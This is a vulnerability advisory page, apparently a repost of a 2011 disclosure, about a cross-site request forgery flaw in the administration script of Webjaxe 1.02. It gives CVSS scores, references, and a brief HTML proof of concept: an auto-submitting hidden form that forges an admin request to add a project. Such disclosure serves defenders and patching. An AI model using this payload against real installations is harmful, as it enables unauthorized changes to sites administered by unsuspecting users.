Webjaxe 1.02 CSRF (Cross-Site Request Forgery)

2011-04-20 / 2011-04-21
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Vulnerability ID: HTB22927 Reference: http://www.htbridge.ch/advisory/csrf_cross_site_request_forgery_in_webja xe.html Product: Webjaxe Vendor: Webjaxe ( http://media4.obspm.fr/outils/webjaxe/en/ ) Vulnerable Version: 1.02 Vendor Notification: 29 March 2011 Vulnerability Type: CSRF (Cross-Site Request Forgery) Risk level: Low Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the "/php/partie_administrateur/administration.php" script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: [html] <form action="http://[host]/php/partie_administrateur/administration.php" method="post" name="main" id="main"> <input type="hidden" name="action" value="ajouter_projet"> <input type="hidden" name="titre_projet" value="123123"> <input type="hidden" name="ajouter" value="Add"> <input type="hidden" name="submit" value="OK"> <input type="submit" id="btn"> </form> <script> document.getElementById('btn').click(); </script> [/html]

References:

http://xforce.iss.net/xforce/xfdb/66757
http://www.securityfocus.com/archive/1/archive/1/517434/100/0/threaded
http://www.htbridge.ch/advisory/csrf_cross_site_request_forgery_in_webjaxe.html
http://secunia.com/advisories/44118
http://osvdb.org/71844


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top